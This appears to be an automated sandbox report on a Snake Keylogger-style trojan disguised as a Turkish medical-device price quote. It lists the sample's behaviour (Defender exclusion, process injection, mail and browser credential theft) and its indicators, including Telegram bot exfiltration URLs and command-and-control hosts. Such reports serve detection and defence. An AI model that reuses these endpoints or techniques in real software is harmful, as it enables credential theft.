                Source: Yara matchFile source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts112
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS1
                Security Software Discovery                		Distributed Component Object Model1
                Clipboard Data                		1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets2
                Process Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572491 Sample: fiyati_teklif 65TIBBI20_ Me... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 21 reallyfreegeoip.org 2->21 23 api.telegram.org 2->23 25 4 other IPs or domains 2->25 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 43 9 other signatures 2->43 8 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe 3 2->8         started        signatures3 39 Tries to detect the country of the analysis system (by using the IP) 21->39 41 Uses the Telegram API (likely for C&C communication) 23->41 process4 signatures5 45 Adds a directory exclusion to Windows Defender 8->45 47 Injects a PE file into a foreign processes 8->47 11 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe 8->17         started        process6 dnsIp7 27 adendanismanlik.com.tr 77.245.159.14, 49822, 587 NIOBEBILISIMHIZMETLERITR Turkey 11->27 29 api.telegram.org 149.154.167.220, 443, 49797 TELEGRAMRU United Kingdom 11->29 31 2 other IPs or domains 11->31 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 53 Loading BitLocker PowerShell Module 15->53 19 conhost.exe 15->19         started        signatures8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe42%ReversingLabsWin32.Trojan.Strictor
                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		172.67.177.134
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    adendanismanlik.com.tr
                    		77.245.159.14
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		193.122.130.0
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high
                          mail.adendanismanlik.com.tr
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.175false
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:36:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://aborters.duckdns.org:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    https://ac.ecosia.org/autocomplete?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.office.com/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://51.38.247.67:8081/_send_.php?Lfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000291D000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://anotherarmy.dns.army:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.org/qfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=enfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2243855683.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4687312061.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://varders.kozow.com:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.org/xml/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.00000000028C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          		api.telegram.orgUnited Kingdom
                                                                          		62041TELEGRAMRUfalse
                                                                          77.245.159.14
                                                                          		adendanismanlik.com.trTurkey
                                                                          		42868NIOBEBILISIMHIZMETLERITRtrue
                                                                          193.122.130.0
                                                                          		checkip.dyndns.comUnited States
                                                                          		31898ORACLE-BMC-31898USfalse
                                                                          172.67.177.134
                                                                          		reallyfreegeoip.orgUnited States
                                                                          		13335CLOUDFLARENETUSfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1572491
                                                                          Start date and time:2024-12-10 16:23:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 14s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:9
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Siparii jpeg docx .exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@8/5@4/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 98%
                                                                          • Number of executed functions: 236
                                                                          • Number of non-executed functions: 12
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 4.175.87.197
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • VT rate limit hit for: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          10:24:07API Interceptor7037155x Sleep call for process: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe modified
                                                                          10:24:10API Interceptor9x Sleep call for process: powershell.exe modified
                                                                          16:23:50Task SchedulerRun new task: {BE63801F-5082-44DD-BC55-2E397AC22C2E} path: .

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                            APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              77.245.159.14fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  193.122.130.0jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  zy1Hkc59UZ.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  e5V82nhCVL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  2pbdb4M4xV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  checkip.dyndns.comNew_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  api.telegram.orgHesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                  • 149.154.167.220
                                                                                                  FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  reallyfreegeoip.orgNew_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 172.67.177.134
                                                                                                  Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 172.67.177.134
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.67.152
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 172.67.177.134

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  TELEGRAMRUHesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                  • 149.154.167.220
                                                                                                  APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  NIOBEBILISIMHIZMETLERITRfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 77.245.159.14
                                                                                                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 77.245.159.14
                                                                                                  hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 77.245.159.27
                                                                                                  https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                  • 77.245.159.9
                                                                                                  PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  • 77.245.148.65
                                                                                                  Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 77.245.159.9
                                                                                                  Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 77.245.159.9
                                                                                                  https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                                                                                  • 77.245.159.21
                                                                                                  SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 77.245.159.7
                                                                                                  file.exeGet hashmaliciousSystemBCBrowse
                                                                                                  • 77.245.149.25
                                                                                                  ORACLE-BMC-31898USNew_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 158.101.44.242
                                                                                                  SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                  • 193.123.195.134
                                                                                                  rPurchaseOrder_PO19202409.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 158.101.44.242
